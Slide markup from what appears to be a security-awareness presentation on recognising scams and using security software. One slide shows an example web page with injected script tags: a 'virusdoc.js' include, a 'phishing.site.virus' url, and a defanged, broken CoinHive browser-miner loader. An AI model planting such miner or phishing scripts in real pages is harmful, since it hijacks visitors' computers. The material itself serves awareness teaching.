              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>text/css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>UTF - 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>google.png/rs/logo/google.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>google.com</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style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572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head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572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body</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>/bad/releases/twsfe_w_20190129_RC02/r/js/virusdoc.js</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>text/javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>UTF - 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>phishing.site.virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>//good/js/ita/inputtools_3.js</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>xttpc://coinhive.som/lib/coinhive.min.js</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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>	&lt;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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>    		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>CoinHive.User('HACK_KEY', bad-boy')).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>	&lt;/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a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9144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&gt;...&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">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Learn to recognize scams</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="345" name="Google Shape;345;p20" descr="Картинки по запросу scams"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3295650"/>
            <a:ext cx="2466975" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Google Shape;346;p20" descr="Картинки по запросу scams"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="83200" y="57750"/>
            <a:ext cx="1081650" cy="540825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="347" name="Google Shape;347;p20" descr="Картинки по запросу scams"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="203000" y="1597875"/>
            <a:ext cx="1928392" cy="1201850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p20" descr="Картинки по запросу Learn to recognize scams"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7374850" y="240075"/>
            <a:ext cx="1573300" cy="1176350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Google Shape;349;p20" descr="Картинки по запросу learn to"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6910300" y="1463450"/>
            <a:ext cx="2074274" cy="1176350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;350;p20" descr="Картинки по запросу learn"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752038" y="2934825"/>
            <a:ext cx="2133600" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Google Shape;351;p20" descr="Картинки по запросу learn"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434025" y="3441600"/>
            <a:ext cx="3124200" cy="1466850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926800" y="2071000"/>
            <a:ext cx="3188100" cy="778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a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>You need have a lot of experience to recognize scam</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>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Use a good security solution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Google Shape;358;p21" descr="Картинки по запросу Security solution"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718375" y="3359775"/>
            <a:ext cx="2965075" cy="1121025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="359" name="Google Shape;359;p21" descr="Картинки по запросу Security solution"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1474975" y="2800050"/>
            <a:ext cx="2562500" cy="999300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="360" name="Google Shape;360;p21" descr="Картинки по запросу Security"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="25200"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98338" y="83200"/>
            <a:ext cx="774325" cy="621100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="361" name="Google Shape;361;p21" descr="Картинки по запросу Security solution"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593275" y="179525"/>
            <a:ext cx="2422975" cy="1170225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="362" name="Google Shape;362;p21" descr="Картинки по запросу Security solution"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="21887" r="18279"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="576304" y="598571"/>
            <a:ext cx="838175" cy="787050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945500" y="1989325"/>
            <a:ext cx="3393300" cy="123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a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
